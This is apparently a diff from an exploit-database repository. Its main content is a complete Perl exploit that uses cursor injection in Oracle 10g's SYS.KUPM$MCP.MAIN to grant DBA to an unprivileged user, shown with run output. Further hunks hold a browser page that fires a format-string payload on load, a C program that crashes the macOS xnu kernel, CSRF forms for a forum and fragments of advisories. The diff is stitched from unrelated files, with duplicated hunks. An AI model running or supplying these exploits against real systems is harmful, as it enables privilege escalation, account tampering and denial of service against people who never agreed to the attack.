#
# Remote Oracle KUPM$MCP.MAIN exploit (10g)
# - Version 2 - New "evil cursor injection" tip!
# - No "create procedure" privilege needed!
# - See: http://www.databasesecurity.com/ (Cursor Injection)
#
# Grant or revoke dba permission to unprivileged user
#
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
#
# REF: http://www.red-database-security.com/
#
# AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com
#
# DATE: Copyright 2007 - Tue Mar 27 10:46:55 CEST 2007
#
# Oracle InstantClient (basic + sdk) required for DBD::Oracle
#
#
# bunker@fin:~$ perl kupm-mcpmainV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait...
# [-] Revoking DBA from BUNKER...
# DBD::Oracle::db do failed: ORA-01951: ROLE 'DBA' not granted to 'BUNKER' (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupm-mcpmainV2.pl line 104.
# [-] Done!
#
# bunker@fin:~$ perl kupm-mcpmainV2.pl -h localhost -s test -u bunker -p **** -g
# [-] Wait...
# [-] Creating evil cursor...
# Cursor: 2
# [-] Go ...(don't worry about errors)!
# DBD::Oracle::st execute failed: ORA-06512: at "SYS.KUPM$MCP", line 874
# ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement "
# BEGIN
# SYS.KUPM$MCP.MAIN(''' AND 0=dbms_sql.execute(2)--','');
# END;
# "] at kupm-mcpmainV2.pl line 134.
# [-] YOU GOT THE POWAH!!
#
# bunker@fin:~$ perl kupm-mcpmainV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait...
# [-] Revoking DBA from BUNKER...
# [-] Done!
#
use warnings;
use strict;
use DBI;
use Getopt::Std;
use vars qw/ %opt /;
sub usage {
print <<"USAGE";
Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>]
Options:
-h <host> target server address
-s <sid> target sid name
-u <user> user
-p <passwd> password
-g|-r (g)rant dba to user | (r)evoke dba from user
[-P <port> Oracle port]
USAGE
exit 0
}
my $opt_string = 'h:s:u:p:grP:';
getopts($opt_string, \%opt) or &usage;
&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );
&usage if ( !$opt{g} and !$opt{r} );
my $user = uc $opt{u};
my $dbh = undef;
if ($opt{P}) {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
} else {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
}
my $sqlcmd = "GRANT ALL PRIVILEGE, DBA TO $user";
print "[-] Wait...\n";
$dbh->func( 1000000, 'dbms_output_enable' );
if ($opt{r}) {
print "[-] Revoking DBA from $user...\n";
$sqlcmd = "REVOKE DBA FROM $user";
$dbh->do( $sqlcmd );
print "[-] Done!\n";
$dbh->disconnect;
exit;
}
print "[-] Creating evil cursor...\n";
my $sth = $dbh->prepare(qq{
DECLARE
MYC NUMBER;
BEGIN
MYC := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0);
DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC);
END;
} );
$sth->execute;
my $cursor = undef;
while (my $line = $dbh->func( 'dbms_output_get' )) {
print "$line\n";
if ($line =~ /^Cursor: (\d)/) {$cursor = $1;}
}
$sth->finish;
print "[-] Go ...(don't worry about errors)!\n";
$sth = $dbh->prepare(qq{
BEGIN
SYS.KUPM\$MCP.MAIN(''' AND 0=dbms_sql.execute($cursor)--','');
END;
});
$sth->execute;
$sth->finish;
print "[-] YOU GOT THE POWAH!!\n";
$dbh->disconnect;
exit;
# milw0rm.com [2007-03-27]

View file

@ -144,6 +144,6 @@ value="uptime"></td></tr>
<tr><td colspan="3" align="center"><input type="submit" name=""
value="Gooooooo!"></td></tr>
</form></table></body></html>~;
}
# milw0rm.com [2005-01-08]
}
# milw0rm.com [2005-01-08]

View file

@ -153,6 +153,6 @@ if ($sock){
}
}
}
}
# milw0rm.com [2005-01-08]
}
# milw0rm.com [2005-01-08]

View file

@ -1,4 +1,3 @@
Application: WingFTP Server 3.2.4 (maybe earlier versions too)
Link: http://www.wftpserver.com/
Vulnerability: CSRF

View file

@ -1,21 +1,21 @@
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>
<title>MOAB-20-01-2007</title>
<script>
function boom() {
var str = '';
for (var i = 0; i < 20; i++) {
str = str + escape('A%n');
}
str = 'aim:gochat?roomname=' + str;
window.location = str;
}
</script>
</head>
<body onload="boom()">
</body>
</html>
# milw0rm.com [2007-01-21]
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>
<title>MOAB-20-01-2007</title>
<script>
function boom() {
var str = '';
for (var i = 0; i < 20; i++) {
str = str + escape('A%n');
}
str = 'aim:gochat?roomname=' + str;
window.location = str;
}
</script>
</head>
<body onload="boom()">
</body>
</html>
# milw0rm.com [2007-01-21]

View file

@ -1,73 +1,73 @@
/* xnu-vfssysctl-dos.c
*
* Copyright (c) 2008 by <mu-b@digit-labs.org>
*
* Apple MACOS X xnu <= 1228.x local kernel DoS POC
* by mu-b - Wed 19 Nov 2008
*
* - Tested on: Apple MACOS X 10.5.5 (xnu-1228.8.20~1/RELEASE_I386)
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#include <hfs/hfs_mount.h>
#include <pthread.h>
#include <string.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <sys/sysctl.h>
#include <unistd.h>
void
hammer (void *arg)
{
char buf[1024 * (255 + 1)];
int n, name[6];
memset (buf, 0, sizeof buf);
while (1)
{
name[0] = CTL_VFS;
name[1] = 17;
name[2] = HFS_SET_PKG_EXTENSIONS;
name[3] = (int) buf;
name[4] = 1024;
name[5] = (rand () % 254) + 1;
n = sysctl (name, 6, NULL, NULL, NULL, 0);
usleep(10);
}
}
int
main (int argc, char **argv)
{
int i, n, tid;
printf ("Apple MACOS X xnu <= 1228.x local kernel DoS PoC\n"
"by: <mu-b@digit-labs.org>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
for (i = 0; i < 4; i++)
{
n = pthread_create (&tid, NULL, hammer, NULL);
if (n < 0)
{
fprintf (stderr, "failed creating hammer thread\n");
return (EXIT_FAILURE);
}
}
while (1)
sleep (1);
/* not reached! */
return (EXIT_SUCCESS);
}
// milw0rm.com [2009-03-23]
/* xnu-vfssysctl-dos.c
*
* Copyright (c) 2008 by <mu-b@digit-labs.org>
*
* Apple MACOS X xnu <= 1228.x local kernel DoS POC
* by mu-b - Wed 19 Nov 2008
*
* - Tested on: Apple MACOS X 10.5.5 (xnu-1228.8.20~1/RELEASE_I386)
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#include <hfs/hfs_mount.h>
#include <pthread.h>
#include <string.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <sys/sysctl.h>
#include <unistd.h>
void
hammer (void *arg)
{
char buf[1024 * (255 + 1)];
int n, name[6];
memset (buf, 0, sizeof buf);
while (1)
{
name[0] = CTL_VFS;
name[1] = 17;
name[2] = HFS_SET_PKG_EXTENSIONS;
name[3] = (int) buf;
name[4] = 1024;
name[5] = (rand () % 254) + 1;
n = sysctl (name, 6, NULL, NULL, NULL, 0);
usleep(10);
}
}
int
main (int argc, char **argv)
{
int i, n, tid;
printf ("Apple MACOS X xnu <= 1228.x local kernel DoS PoC\n"
"by: <mu-b@digit-labs.org>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
for (i = 0; i < 4; i++)
{
n = pthread_create (&tid, NULL, hammer, NULL);
if (n < 0)
{
fprintf (stderr, "failed creating hammer thread\n");
return (EXIT_FAILURE);
}
}
while (1)
sleep (1);
/* not reached! */
return (EXIT_SUCCESS);
}
// milw0rm.com [2009-03-23]

11
platforms/osx/local/30096.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/24208/info
Apple Mac OS X's VPN service daemon is prone to a format-string vulnerability because it fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function.
Attackers may exploit this issue to crash the application or execute arbitrary code with superuser privileges. Successful exploits can result in a complete compromise of vulnerable computers.
Apple Mac OS X Server 10.4.9 and prior versions are vulnerable to this issue.
This issue was originally included in BID 24144 (Apple Mac OS X 2007-005 Multiple Security Vulnerabilities), but has been given its own record.
http://www.exploit-db.com/sploits/30096.tar.gz

View file

@ -45,7 +45,7 @@ This exploit will change this info for every user that opens it and is logged in
<input type='hidden' name='showprofile' value='1'>
<input type='hidden' name='avatar' value=''>
<input type='hidden' name='forumtemplate' value='1'>
<textarea name='signature'>Free your mind and the ass will follow.</textarea>
<textarea name='signature'>Free your mind and the ass will follow.&lt;/textarea&gt;
<input type='submit' name='submit' value='change details'>
</form>
@ -66,7 +66,7 @@ Admins must run this exploit.
<input type='text' name='email' value='email@mail.com<mailto:email@mail.com>'>
<input type='text' name='rank' value='0'>
<input type='hidden' name='isbanned' value='No'>
<textarea name='sig'>this is my signature</textarea>
<textarea name='sig'>this is my signature&lt;/textarea&gt;
<input type='submit' name='submit' value='Edit This user'>
</form>

View file

@ -1,4 +1,3 @@
Pentest Information:
====================
GESEC Team (~remove) discover a input validation vulnerability on Barracuda - Web Application Firewall 660 (Appliance).

View file

@ -1,4 +1,3 @@
|| || | ||
o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
( : / (_) / ( .

Some files were not shown because too many files have changed in this diff Show more